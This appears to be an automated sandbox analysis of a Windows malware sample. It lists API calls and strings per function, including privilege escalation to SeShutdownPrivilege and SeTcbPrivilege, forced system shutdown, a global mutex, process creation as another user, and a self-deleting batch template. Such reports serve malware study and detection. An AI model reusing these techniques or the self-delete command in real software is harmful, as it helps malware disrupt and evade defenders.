CreateDirectoryW.KERNEL32(?,00000000), ref: 00FE44CC
SetLastError.KERNEL32(00000050), ref: 00FE44EF

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C44461, Relevance: 7.2, APIs: 4, Instructions: 56

APIs

PathSkipRootW.SHLWAPI(?), ref: 00C4448B
GetFileAttributesW.KERNEL32(?), ref: 00C444B8
CreateDirectoryW.KERNEL32(?,00000000), ref: 00C444CC
SetLastError.KERNEL32(00000050), ref: 00C444EF

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCA46D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 51

APIs

memset.MSVCRT ref: 00FCA47C
memset.MSVCRT ref: 00FCA4BF
memset.MSVCRT ref: 00FCA4F5

Strings

8, xrefs: 00FCA4B3

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2A46D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 51

APIs

memset.MSVCRT ref: 00C2A47C
memset.MSVCRT ref: 00C2A4BF
memset.MSVCRT ref: 00C2A4F5

Strings

8, xrefs: 00C2A4B3

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FFE290, Relevance: 7.2, APIs: 4, Instructions: 48

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FFEC47
UnhandledExceptionFilter.KERNEL32(00FC4D1C), ref: 00FFEC52
GetCurrentProcess.KERNEL32 ref: 00FFEC5D
TerminateProcess.KERNEL32 ref: 00FFEC64

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C5E290, Relevance: 7.2, APIs: 4, Instructions: 48

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C5EC47
UnhandledExceptionFilter.KERNEL32(00C24D1C), ref: 00C5EC52
GetCurrentProcess.KERNEL32 ref: 00C5EC5D
TerminateProcess.KERNEL32 ref: 00C5EC64

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351E38C, Relevance: 7.2, APIs: 4, Instructions: 45

APIs

GetLastError.KERNEL32(?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351E390

Part of subcall function 0351E267: TlsGetValue.KERNEL32(?,0351E3A3), ref: 0351E270
Part of subcall function 0351E267: DecodePointer.KERNEL32(?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351E282
Part of subcall function 0351E267: TlsSetValue.KERNEL32 ref: 0351E291

SetLastError.KERNEL32(?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351E3FA

Part of subcall function 0351FF25: Sleep.KERNEL32(00000000), ref: 0351FF4D

DecodePointer.KERNEL32(?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351E3CC
GetCurrentThreadId.KERNEL32 ref: 0351E3E2

Part of subcall function 0351FE47: HeapFree.KERNEL32(00000000,00000000,?,0351E3F6,?,?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351FE5D
Part of subcall function 0351FE47: GetLastError.KERNEL32(?,?,0351E3F6,?,?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351FE6F

Part of subcall function 0351E2D8: GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 0351E2E9
Part of subcall function 0351E2D8: InterlockedIncrement.KERNEL32(?,?,00000000), ref: 0351E32A

Memory Dump Source

Source File: 00000002.00000002.828112965.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000002.00000002.828095997.03500000.00000002.sdmp
Associated: 00000002.00000002.828175402.03522000.00000002.sdmp
Associated: 00000002.00000002.828231158.03540000.00000008.sdmp
Associated: 00000002.00000002.828283216.03559000.00000004.sdmp
Associated: 00000002.00000002.828301623.0355C000.00000002.sdmp

Function 00C3506A, Relevance: 7.2, APIs: 4, Instructions: 38

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00C3507A
Thread32First.KERNEL32(?,?), ref: 00C35095
Thread32Next.KERNEL32(?,?), ref: 00C350A8
CloseHandle.KERNEL32 ref: 00C350B3

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF2155, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133

APIs

Part of subcall function 00FE3EFF: CharLowerW.USER32(?), ref: 00FE3FBA

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

ExitWindowsEx.USER32(00000014,80000000), ref: 00FF228F
InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,?,80000000), ref: 00FF22CF

Part of subcall function 00FD9C8D: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FD9CCE
Part of subcall function 00FD9C8D: PathRemoveFileSpecW.SHLWAPI(?), ref: 00FD9D17
Part of subcall function 00FD9C8D: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FD9D3E
Part of subcall function 00FD9C8D: PathRemoveFileSpecW.SHLWAPI(?), ref: 00FD9D87
Part of subcall function 00FD9C8D: SetEvent.KERNEL32 ref: 00FD9D9A
Part of subcall function 00FD9C8D: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FD9DAD
Part of subcall function 00FD9C8D: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FD9DF1
Part of subcall function 00FD9C8D: CharToOemW.USER32(?,?), ref: 00FD9E6F
Part of subcall function 00FD9C8D: CharToOemW.USER32(?,?), ref: 00FD9E81
Part of subcall function 00FD9C8D: ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 00FD9EEC

Part of subcall function 00FE582C: EnterCriticalSection.KERNEL32(01003510,?,?,?,00FDE9BA), ref: 00FE5842
Part of subcall function 00FE582C: LeaveCriticalSection.KERNEL32(01003510,?,?,?,00FDE9BA), ref: 00FE5868
Part of subcall function 00FE582C: CreateMutexW.KERNEL32(01002974,00000000,Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}), ref: 00FE587A

Part of subcall function 00FD2FB7: ReleaseMutex.KERNEL32 ref: 00FD2FBB
Part of subcall function 00FD2FB7: CloseHandle.KERNEL32 ref: 00FD2FC2

ExitWindowsEx.USER32(00000014,80000000), ref: 00FF22E2

Part of subcall function 00FD50C0: GetCurrentThread.KERNEL32 ref: 00FD50D4
Part of subcall function 00FD50C0: OpenThreadToken.ADVAPI32 ref: 00FD50DB
Part of subcall function 00FD50C0: GetCurrentProcess.KERNEL32 ref: 00FD50EB
Part of subcall function 00FD50C0: OpenProcessToken.ADVAPI32 ref: 00FD50F2
Part of subcall function 00FD50C0: LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 00FD5113
Part of subcall function 00FD50C0: AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00FD5128
Part of subcall function 00FD50C0: GetLastError.KERNEL32 ref: 00FD5132
Part of subcall function 00FD50C0: CloseHandle.KERNEL32(00000001), ref: 00FD5143

Part of subcall function 00FE407B: memcpy.MSVCRT ref: 00FE409B

Strings

SeShutdownPrivilege, xrefs: 00FF22B1

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C52155, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133

APIs

Part of subcall function 00C43EFF: CharLowerW.USER32(?), ref: 00C43FBA

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

ExitWindowsEx.USER32(00000014,80000000), ref: 00C5228F
InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,?,80000000), ref: 00C522CF

Part of subcall function 00C39C8D: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C39CCE
Part of subcall function 00C39C8D: PathRemoveFileSpecW.SHLWAPI(?), ref: 00C39D17
Part of subcall function 00C39C8D: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C39D3E
Part of subcall function 00C39C8D: PathRemoveFileSpecW.SHLWAPI(?), ref: 00C39D87
Part of subcall function 00C39C8D: SetEvent.KERNEL32 ref: 00C39D9A
Part of subcall function 00C39C8D: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C39DAD
Part of subcall function 00C39C8D: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C39DF1
Part of subcall function 00C39C8D: CharToOemW.USER32(?,?), ref: 00C39E6F
Part of subcall function 00C39C8D: CharToOemW.USER32(?,?), ref: 00C39E81
Part of subcall function 00C39C8D: ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 00C39EEC

Part of subcall function 00C4582C: EnterCriticalSection.KERNEL32(00C63510,?,?,?,00C3E9BA), ref: 00C45842
Part of subcall function 00C4582C: LeaveCriticalSection.KERNEL32(00C63510,?,?,?,00C3E9BA), ref: 00C45868
Part of subcall function 00C4582C: CreateMutexW.KERNEL32(00C62974,00000000,00C636DE), ref: 00C4587A

Part of subcall function 00C32FB7: ReleaseMutex.KERNEL32 ref: 00C32FBB
Part of subcall function 00C32FB7: CloseHandle.KERNEL32 ref: 00C32FC2

ExitWindowsEx.USER32(00000014,80000000), ref: 00C522E2

Part of subcall function 00C350C0: GetCurrentThread.KERNEL32 ref: 00C350D4
Part of subcall function 00C350C0: OpenThreadToken.ADVAPI32 ref: 00C350DB
Part of subcall function 00C350C0: GetCurrentProcess.KERNEL32 ref: 00C350EB
Part of subcall function 00C350C0: OpenProcessToken.ADVAPI32 ref: 00C350F2
Part of subcall function 00C350C0: LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 00C35113
Part of subcall function 00C350C0: AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00C35128
Part of subcall function 00C350C0: GetLastError.KERNEL32 ref: 00C35132
Part of subcall function 00C350C0: CloseHandle.KERNEL32(00000001), ref: 00C35143

Part of subcall function 00C4407B: memcpy.MSVCRT ref: 00C4409B

Strings

SeShutdownPrivilege, xrefs: 00C522B1

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF299E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51

APIs

shutdown.WS2_32(?,00000001), ref: 00FF29AC
WSAGetLastError.WS2_32(?,00000001,?,?,?,?,?,?,?,00FEFF4F,?,?,?,00002710,?,?), ref: 00FF29CD
WSASetLastError.WS2_32(00000000,?,00000001), ref: 00FF2A12

Strings

, xrefs: 00FF29F3

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C5299E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51

APIs

shutdown.WS2_32(?,00000001), ref: 00C529AC
WSAGetLastError.WS2_32(?,00000001,?,?,?,?,?,?,?,00C4FF4F,?,?,?,00002710,?,?), ref: 00C529CD
WSASetLastError.WS2_32(00000000,?,00000001), ref: 00C52A12

Strings

, xrefs: 00C529F3

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF31E5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30

APIs

Part of subcall function 00FF2755: EnterCriticalSection.KERNEL32(01003510,?,00FF30AF,?,?,00000000), ref: 00FF2765
Part of subcall function 00FF2755: LeaveCriticalSection.KERNEL32(01003510,?,00000000), ref: 00FF278F

WSAAddressToStringA.WS2_32(?,?,00000000,?,?), ref: 00FF320B
lstrcpyA.KERNEL32(?,0:0,?,00000000,?,?,?,?,?,?,00FF0029,?,?,?,?), ref: 00FF321B

Strings

0, xrefs: 00FF31FD
0:0, xrefs: 00FF3215

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C531E5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30

APIs

Part of subcall function 00C52755: EnterCriticalSection.KERNEL32(00C63510,?,00C530AF,?,?,00000000), ref: 00C52765
Part of subcall function 00C52755: LeaveCriticalSection.KERNEL32(00C63510,?,00000000), ref: 00C5278F

WSAAddressToStringA.WS2_32(?,?,00000000,?,?), ref: 00C5320B
lstrcpyA.KERNEL32(?,0:0,?,00000000,?,?,?,?,?,?,00C50029,?,?,?,?), ref: 00C5321B

Strings

0, xrefs: 00C531FD
0:0, xrefs: 00C53215

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF2DBA, Relevance: 6.9, APIs: 2, Strings: 1, Instructions: 63

APIs

WSAGetLastError.WS2_32 ref: 00FF2DF0
WSASetLastError.WS2_32(00002775), ref: 00FF2E54

Strings

, xrefs: 00FF2E18

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C52DBA, Relevance: 6.9, APIs: 2, Strings: 1, Instructions: 63

APIs

WSAGetLastError.WS2_32 ref: 00C52DF0
WSASetLastError.WS2_32(00002775), ref: 00C52E54

Strings

, xrefs: 00C52E18

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD1D27, Relevance: 6.5, APIs: 5, Instructions: 213

APIs

memset.MSVCRT ref: 00FD1DCD

Part of subcall function 00FCF1EF: memcmp.MSVCRT ref: 00FCF1FB

Part of subcall function 00FCF040: memcmp.MSVCRT ref: 00FCF0B6

Part of subcall function 00FCEEA9: memcpy.MSVCRT ref: 00FCEED2

Part of subcall function 00FCEDAE: memcpy.MSVCRT ref: 00FCEDF9

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

memset.MSVCRT ref: 00FD1E71
memcpy.MSVCRT ref: 00FD1E84
memcpy.MSVCRT ref: 00FD1EA6
memcpy.MSVCRT ref: 00FD1EC6

Part of subcall function 00FF046D: EnterCriticalSection.KERNEL32(010030F4,?,?,00FCE3BD,00000000,?,?,00000001), ref: 00FF047A
Part of subcall function 00FF046D: LeaveCriticalSection.KERNEL32(010030F4,?,?,00FCE3BD,00000000,?,?,00000001), ref: 00FF0488

Part of subcall function 00FCC907: EnterCriticalSection.KERNEL32(?,?,00000002,00000001,?,00000000,00FCCB5E,?), ref: 00FCC961
Part of subcall function 00FCC907: InterlockedIncrement.KERNEL32 ref: 00FCC99E
Part of subcall function 00FCC907: SetEvent.KERNEL32 ref: 00FCC9BC
Part of subcall function 00FCC907: LeaveCriticalSection.KERNEL32(?,?,?,00000002,00000001,?,00000000,00FCCB5E,?), ref: 00FCC9C9

Part of subcall function 00FCF825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00FCF82D

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C31D27, Relevance: 6.5, APIs: 5, Instructions: 213

APIs

memset.MSVCRT ref: 00C31DCD

Part of subcall function 00C2F1EF: memcmp.MSVCRT ref: 00C2F1FB

Part of subcall function 00C2F040: memcmp.MSVCRT ref: 00C2F0B6

Part of subcall function 00C2EEA9: memcpy.MSVCRT ref: 00C2EED2

Part of subcall function 00C2EDAE: memcpy.MSVCRT ref: 00C2EDF9

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

memset.MSVCRT ref: 00C31E71
memcpy.MSVCRT ref: 00C31E84
memcpy.MSVCRT ref: 00C31EA6
memcpy.MSVCRT ref: 00C31EC6

Part of subcall function 00C5046D: EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
Part of subcall function 00C5046D: LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

Part of subcall function 00C2C907: EnterCriticalSection.KERNEL32(?,?,00000002,00000001,?,00000000,00C2CB5E,?), ref: 00C2C961
Part of subcall function 00C2C907: InterlockedIncrement.KERNEL32 ref: 00C2C99E
Part of subcall function 00C2C907: SetEvent.KERNEL32 ref: 00C2C9BC
Part of subcall function 00C2C907: LeaveCriticalSection.KERNEL32(?,?,?,00000002,00000001,?,00000000,00C2CB5E,?), ref: 00C2C9C9

Part of subcall function 00C2F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00C2F82D

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCE6AF, Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 47

APIs

GetFileAttributesW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data), ref: 00FCE6BC
CreateFileW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data,80000000,00000007,00000000,00000003,?,00000000), ref: 00FCE6DC

Part of subcall function 00FCE348: CloseHandle.KERNEL32 ref: 00FCE354

Part of subcall function 00FCE5F1: memcpy.MSVCRT ref: 00FCE632
Part of subcall function 00FCE5F1: memcpy.MSVCRT ref: 00FCE645
Part of subcall function 00FCE5F1: memcpy.MSVCRT ref: 00FCE658
Part of subcall function 00FCE5F1: memcpy.MSVCRT ref: 00FCE663
Part of subcall function 00FCE5F1: GetFileTime.KERNEL32(?,?,?), ref: 00FCE687
Part of subcall function 00FCE5F1: memcpy.MSVCRT ref: 00FCE69D

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00FCE6B2 00FCE6B3 00FCE6B9 00FCE6DB

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FD92DF, Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 46

APIs

memset.MSVCRT ref: 00FD92F2
InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00FD9314

Part of subcall function 00FD93E9: SetLastError.KERNEL32(00000008,00003A98,?,00000000,00FD9326,?,?,00000000), ref: 00FD9412
Part of subcall function 00FD93E9: memcpy.MSVCRT ref: 00FD9432
Part of subcall function 00FD93E9: memcpy.MSVCRT ref: 00FD946A
Part of subcall function 00FD93E9: memcpy.MSVCRT ref: 00FD9482

Strings

<, xrefs: 00FD930D

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C392DF, Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 46

APIs

memset.MSVCRT ref: 00C392F2
InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00C39314

Part of subcall function 00C393E9: SetLastError.KERNEL32(00000008,00003A98,?,00000000,00C39326,?,?,00000000), ref: 00C39412
Part of subcall function 00C393E9: memcpy.MSVCRT ref: 00C39432
Part of subcall function 00C393E9: memcpy.MSVCRT ref: 00C3946A
Part of subcall function 00C393E9: memcpy.MSVCRT ref: 00C39482

Strings

<, xrefs: 00C3930D

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD95BE, Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 45

APIs

Part of subcall function 00FF3629: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 00FF363C
Part of subcall function 00FF3629: GetLastError.KERNEL32(?,00FD5032,?,00000008,?,?,?,?,?,?,00FE49E1,?,?,00000001), ref: 00FF3646
Part of subcall function 00FF3629: GetTokenInformation.ADVAPI32(?,00000001,?,?,?), ref: 00FF366E

EqualSid.ADVAPI32(?,5B867A00), ref: 00FD95E1

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Part of subcall function 00FD52FF: LoadLibraryA.KERNEL32(userenv.dll), ref: 00FD530F
Part of subcall function 00FD52FF: GetProcAddress.KERNEL32(?,CreateEnvironmentBlock), ref: 00FD532D
Part of subcall function 00FD52FF: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00FD5339
Part of subcall function 00FD52FF: memset.MSVCRT ref: 00FD5379
Part of subcall function 00FD52FF: CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?), ref: 00FD53C6
Part of subcall function 00FD52FF: CloseHandle.KERNEL32(?), ref: 00FD53DA
Part of subcall function 00FD52FF: CloseHandle.KERNEL32(?), ref: 00FD53E0
Part of subcall function 00FD52FF: FreeLibrary.KERNEL32 ref: 00FD53F4

CloseHandle.KERNEL32(00000001), ref: 00FD9628

Strings

"%s", xrefs: 00FD95F5

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C395BE, Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 45

APIs

Part of subcall function 00C53629: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 00C5363C
Part of subcall function 00C53629: GetLastError.KERNEL32(?,00C35032,?,00000008,?,?,?,?,?,?,00C449E1,?,?,00000001), ref: 00C53646
Part of subcall function 00C53629: GetTokenInformation.ADVAPI32(?,00000001,?,?,?), ref: 00C5366E

EqualSid.ADVAPI32(?,5B867A00), ref: 00C395E1

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C352FF: LoadLibraryA.KERNEL32(userenv.dll), ref: 00C3530F
Part of subcall function 00C352FF: GetProcAddress.KERNEL32(?,CreateEnvironmentBlock), ref: 00C3532D
Part of subcall function 00C352FF: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00C35339
Part of subcall function 00C352FF: memset.MSVCRT ref: 00C35379
Part of subcall function 00C352FF: CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?), ref: 00C353C6
Part of subcall function 00C352FF: CloseHandle.KERNEL32(?), ref: 00C353DA
Part of subcall function 00C352FF: CloseHandle.KERNEL32(?), ref: 00C353E0
Part of subcall function 00C352FF: FreeLibrary.KERNEL32 ref: 00C353F4

CloseHandle.KERNEL32(00000001), ref: 00C39628

Strings

"%s", xrefs: 00C395F5

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE67C9, Relevance: 6.4, APIs: 5, Instructions: 160

APIs

Part of subcall function 00FCF1A8: EnterCriticalSection.KERNEL32(01003510,?,00FCC78E,?,?,?,00000001,00FE4DE8,00000001), ref: 00FCF1B8
Part of subcall function 00FCF1A8: LeaveCriticalSection.KERNEL32(01003510,?,00FCC78E,?,?,?,00000001,00FE4DE8,00000001), ref: 00FCF1E2

memcmp.MSVCRT ref: 00FE67F4

Part of subcall function 00FED95F: GetSystemTime.KERNEL32(?), ref: 00FED969

memcmp.MSVCRT ref: 00FE6859

Part of subcall function 00FD6A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00FECB50,?,00000000,00000001,00000001,00FECB1A,?,00FD54E4,?,@echo off%sdel /F "%s",?,?), ref: 00FD6A43
Part of subcall function 00FD6A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00FECB50,?,00000000,00000001,00000001,00FECB1A,?,00FD54E4,?,@echo off%sdel /F "%s",?), ref: 00FD6A56

memset.MSVCRT ref: 00FE68ED
memcpy.MSVCRT ref: 00FE691A
memcmp.MSVCRT ref: 00FE6952

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C467C9, Relevance: 6.4, APIs: 5, Instructions: 160

APIs

Part of subcall function 00C2F1A8: EnterCriticalSection.KERNEL32(00C63510,?,00C2C78E,?,?,?,00000001,00C44DE8,00000001), ref: 00C2F1B8
Part of subcall function 00C2F1A8: LeaveCriticalSection.KERNEL32(00C63510,?,00C2C78E,?,?,?,00000001,00C44DE8,00000001), ref: 00C2F1E2

memcmp.MSVCRT ref: 00C467F4

Part of subcall function 00C4D95F: GetSystemTime.KERNEL32(?), ref: 00C4D969

memcmp.MSVCRT ref: 00C46859

Part of subcall function 00C36A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?,?), ref: 00C36A43
Part of subcall function 00C36A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?), ref: 00C36A56

memset.MSVCRT ref: 00C468ED
memcpy.MSVCRT ref: 00C4691A
memcmp.MSVCRT ref: 00C46952

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCEE09, Relevance: 6.4, APIs: 4, Instructions: 62

APIs

memset.MSVCRT ref: 00FCEE1C
memcpy.MSVCRT ref: 00FCEE37
memcpy.MSVCRT ref: 00FCEE5F
memcpy.MSVCRT ref: 00FCEE83

Part of subcall function 00FCEDAE: memcpy.MSVCRT ref: 00FCEDF9

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2EE09, Relevance: 6.4, APIs: 4, Instructions: 62

APIs

memset.MSVCRT ref: 00C2EE1C
memcpy.MSVCRT ref: 00C2EE37
memcpy.MSVCRT ref: 00C2EE5F
memcpy.MSVCRT ref: 00C2EE83

Part of subcall function 00C2EDAE: memcpy.MSVCRT ref: 00C2EDF9

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD7DF0, Relevance: 6.4, APIs: 3, Instructions: 56

APIs

EnterCriticalSection.KERNEL32(00000014,?,?,?,?,00FCB9D5,00000003,?,00000000,00000000), ref: 00FD7E07
InterlockedIncrement.KERNEL32(?,?), ref: 00FD7E5B
LeaveCriticalSection.KERNEL32(00000014,?,?,?,00000000,?,?,?,?,00FCB9D5,00000003,?,00000000,00000000), ref: 00FD7E62

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C37DF0, Relevance: 6.4, APIs: 3, Instructions: 56

APIs

EnterCriticalSection.KERNEL32(00000014,?,?,?,?,00C2B9D5,00000003,?,00000000,00000000), ref: 00C37E07
InterlockedIncrement.KERNEL32(?,?), ref: 00C37E5B
LeaveCriticalSection.KERNEL32(00000014,?,?,?,00000000,?,?,?,?,00C2B9D5,00000003,?,00000000,00000000), ref: 00C37E62

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCF5E9, Relevance: 6.3, APIs: 4, Instructions: 168

APIs

Part of subcall function 00FD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD69A8

Part of subcall function 00FECFF2: memset.MSVCRT ref: 00FED01A

memcpy.MSVCRT ref: 00FCF79E

Part of subcall function 00FED06B: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00FED07B

memcpy.MSVCRT ref: 00FCF719
memcpy.MSVCRT ref: 00FCF731

Part of subcall function 00FED17E: memcpy.MSVCRT ref: 00FED19E
Part of subcall function 00FED17E: memcpy.MSVCRT ref: 00FED1CA

memcpy.MSVCRT ref: 00FCF78D

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2F5E9, Relevance: 6.3, APIs: 4, Instructions: 168

APIs

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

Part of subcall function 00C4CFF2: memset.MSVCRT ref: 00C4D01A

memcpy.MSVCRT ref: 00C2F79E

Part of subcall function 00C4D06B: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00C4D07B

memcpy.MSVCRT ref: 00C2F719
memcpy.MSVCRT ref: 00C2F731

Part of subcall function 00C4D17E: memcpy.MSVCRT ref: 00C4D19E
Part of subcall function 00C4D17E: memcpy.MSVCRT ref: 00C4D1CA

memcpy.MSVCRT ref: 00C2F78D

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD5AD5, Relevance: 6.3, APIs: 3, Instructions: 10

APIs

GetLastError.KERNEL32(?,00FCBA1E), ref: 00FD5AD6
TlsSetValue.KERNEL32(00000000), ref: 00FD5AE6
SetLastError.KERNEL32(?,?,00FCBA1E), ref: 00FD5AED

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

